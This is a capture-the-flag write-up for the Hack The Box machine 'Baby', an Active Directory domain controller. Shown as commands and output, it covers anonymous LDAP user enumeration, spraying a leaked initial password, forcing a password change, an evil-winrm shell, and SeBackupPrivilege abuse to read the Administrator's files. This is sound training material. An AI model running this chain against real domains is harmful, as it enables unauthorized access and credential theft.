HTB | Baby

Machine - https://app.hackthebox.com/machines/Baby

IP - 10.129.60.223

NMAP

nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49664,49669,51495,51496,51505,61220 10.129.60.223 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-10-16 06:10 UTC
Nmap scan report for ip-10-129-60-223.ap-south-1.compute.internal (10.129.60.223)
Host is up (0.12s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-16 06:11:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2025-08-18T12:14:43
|_Not valid after:  2026-02-17T12:14:43
|_ssl-date: 2025-10-16T06:12:30+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   DNS_Tree_Name: baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-16T06:11:50+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
51495/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
51496/tcp open  msrpc         Microsoft Windows RPC
51505/tcp open  msrpc         Microsoft Windows RPC
61220/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-10-16T06:11:53
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 102.16 seconds

SMB

null authentication is there but we cannot enum shares

netexec smb baby.vl -u "" -p "" --shares
SMB         10.129.60.223   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.60.223   445    BABYDC           [+] baby.vl\\: 
SMB         10.129.60.223   445    BABYDC           [-] Error enumerating shares: STATUS_ACCESS_DENIED

LDAP

 ldapsearch -H ldap://10.129.60.223 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=baby,DC=vl
namingcontexts: CN=Configuration,DC=baby,DC=vl
namingcontexts: CN=Schema,CN=Configuration,DC=baby,DC=vl
namingcontexts: DC=DomainDnsZones,DC=baby,DC=vl
namingcontexts: DC=ForestDnsZones,DC=baby,DC=vl

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

we can get the user list via nxc

netexec ldap baby.vl -u "" -p "" --users
LDAP        10.129.60.223   389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.60.223   389    BABYDC           [+] baby.vl\\: 
LDAP        10.129.60.223   389    BABYDC           [*] Enumerated 9 domain users: baby.vl
LDAP        10.129.60.223   389    BABYDC           -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        10.129.60.223   389    BABYDC           Guest                         <never>             0        Built-in account for guest access to the computer/domain    
LDAP        10.129.60.223   389    BABYDC           Jacqueline.Barnett            2021-11-21 15:11:03 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Ashley.Webb                   2021-11-21 15:11:03 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Hugh.George                   2021-11-21 15:11:03 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Leonard.Dyer                  2021-11-21 15:11:03 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Connor.Wilkinson              2021-11-21 15:11:08 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Joseph.Hughes                 2021-11-21 15:11:08 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Kerry.Wilson                  2021-11-21 15:11:08 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Teresa.Bell                   2021-11-21 15:14:37 0        Set initial password to BabyStart123!

 netexec ldap baby.vl -u "" -p "" --query "(objectClass=*)" "" | grep "Response for object:"
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Administrator,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Guest,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=krbtgt,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Domain Computers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Schema Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Domain Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Domain Users,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Domain Guests,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Protected Users,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Key Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=dev,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Ian Walker,OU=dev,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=it,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Caroline Robinson,OU=it,DC=baby,DC=vl

Let’s combine both

Foothold/shell

Shell as Caroline.Robinson

From the description we got the credential Teresa.Bell

netexec smb baby.vl -u "Teresa.Bell" -p "BabyStart123!"
SMB         10.129.60.223   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE 
admin@ip-172-31-25-116:~/baby$ netexec winrm baby.vl -u "Teresa.Bell" -p "BabyStart123!"
WINRM       10.129.60.223   5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) 
WINRM       10.129.60.223   5985   BABYDC           [-] baby.vl\\Teresa.Bell:BabyStart123!
admin@ip-172-31-25-116:~/baby$ netexec ldap baby.vl -u "Teresa.Bell" -p "BabyStart123!"
LDAP        10.129.60.223   389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\Teresa.Bell:BabyStart123!

Looks like it is not working for Teresa, let’s do passwordspray

netexec smb baby.vl -u username.txt -p 'BabyStart123!' --continue-on-success
SMB         10.129.60.223   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\it:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

SMB passwordspray fails but for Caroline gives STATUS_PASSWORD_MUST_CHANGE, let’s try for LDAP

netexec ldap baby.vl -u username.txt -p 'BabyStart123!' --continue-on-success
LDAP        10.129.60.223   389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\Jacqueline.Barnett:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\Ashley.Webb:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\Hugh.George:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\Leonard.Dyer:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\Ian.Walker:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\it:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\Connor.Wilkinson:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\Joseph.Hughes:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\Kerry.Wilson:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\Teresa.Bell:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

same error for Caroline STATUS_PASSWORD_MUST_CHANGE let’s change the password

netexec smb baby.vl -u 'Caroline.Robinson' -p 'BabyStart123!' -M change-password -o NEWPASS='P@ssw0rd@123'
SMB         10.129.60.223   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE 
CHANGE-P... 10.129.60.223   445    BABYDC           [+] Successfully changed password for Caroline.Robinson

and we can authenticate

netexec ldap baby.vl -u 'Caroline.Robinson' -p 'P@ssw0rd@123'
LDAP        10.129.60.223   389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.60.223   389    BABYDC           [+] baby.vl\\Caroline.Robinson:P@ssw0rd@123 (Pwn3d!)

we can get the shares and we have READ, WRITE on C$

netexec smb baby.vl -u 'Caroline.Robinson' -p 'P@ssw0rd@123' --shares
SMB         10.129.60.223   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.60.223   445    BABYDC           [+] baby.vl\\Caroline.Robinson:P@ssw0rd@123 
SMB         10.129.60.223   445    BABYDC           [*] Enumerated shares
SMB         10.129.60.223   445    BABYDC           Share           Permissions     Remark
SMB         10.129.60.223   445    BABYDC           -----           -----------     ------
SMB         10.129.60.223   445    BABYDC           ADMIN$          READ            Remote Admin
SMB         10.129.60.223   445    BABYDC           C$              READ,WRITE      Default share
SMB         10.129.60.223   445    BABYDC           IPC$            READ            Remote IPC
SMB         10.129.60.223   445    BABYDC           NETLOGON        READ            Logon server share 
SMB         10.129.60.223   445    BABYDC           SYSVOL          READ            Logon server share

let’s winrm to the server

netexec winrm baby.vl -u 'Caroline.Robinson' -p 'P@ssw0rd@123'
WINRM       10.129.60.223   5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) 
WINRM       10.129.60.223   5985   BABYDC           [+] baby.vl\\Caroline.Robinson:P@ssw0rd@123 (Pwn3d!)

and we are in

 ruby /opt/evil-winrm/evil-winrm.rb -i 10.129.60.223 -u 'Caroline.Robinson' -p 'P@ssw0rd@123'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson\\Documents>

found user.txt

   Directory: C:\\Users\\Caroline.Robinson\\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        10/16/2025   6:06 AM             34 user.txt

Priveleage Esclation

Shell as ?

SeBackupPrivilege

We are in the backup operator group and have SeBackupPrivilege

*Evil-WinRM* PS C:\\Users\\Caroline.Robinson\\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\\Backup Operators                   Alias            S-1-5-32-551                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
BABY\\it                                    Group            S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\\High Mandatory Level       Label            S-1-16-12288
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson\\Documents>

*Evil-WinRM* PS C:\\Users\\Caroline.Robinson\\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

This repo has a nice set of PowerShell tools for abusing the SeBackupPrivilege

Let’s download and import them into my current session:

*Evil-WinRM* PS C:\\temp> Import-Module .\\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\\temp> Import-Module .\\SeBackupPrivilegeUtils.dll

Now I can copy root.txt

Copy-FileSeBackupPrivilege C:\\Users\\Administrator\\Desktop\\root.txt root.txt
*Evil-WinRM* PS C:\\temp> dir

    Directory: C:\\temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/16/2025   9:18 AM             34 root.txt
-a----        10/16/2025   8:50 AM          12288 SeBackupPrivilegeCmdLets.dll
-a----        10/16/2025   8:50 AM          16384 SeBackupPrivilegeUtils.dll

PreviousHTB | Certified NextHTB | Breach

Last updated 1 month ago